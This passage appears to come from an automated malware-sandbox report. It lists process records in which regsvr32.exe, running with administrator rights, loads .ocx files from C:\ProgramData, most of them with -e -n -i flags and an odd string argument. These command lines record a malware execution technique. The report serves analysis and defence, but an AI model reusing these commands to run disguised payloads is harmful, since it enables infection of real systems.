                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:17:29:18
                                                                                                                                              Start date:02/12/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:regsvr32 C:\ProgramData\Volet3.ocx
                                                                                                                                              Imagebase:0x1f0000
                                                                                                                                              File size:20992 bytes
                                                                                                                                              MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:17:29:19
                                                                                                                                              Start date:02/12/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx
                                                                                                                                              Imagebase:0x1f0000
                                                                                                                                              File size:20992 bytes
                                                                                                                                              MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:17:29:20
                                                                                                                                              Start date:02/12/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet5.ocx
                                                                                                                                              Imagebase:0x1f0000
                                                                                                                                              File size:20992 bytes
                                                                                                                                              MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:17:29:20
                                                                                                                                              Start date:02/12/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet6.ocx
                                                                                                                                              Imagebase:0x1f0000
                                                                                                                                              File size:20992 bytes
                                                                                                                                              MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              Disassembly

                                                                                                                                              Code Analysis
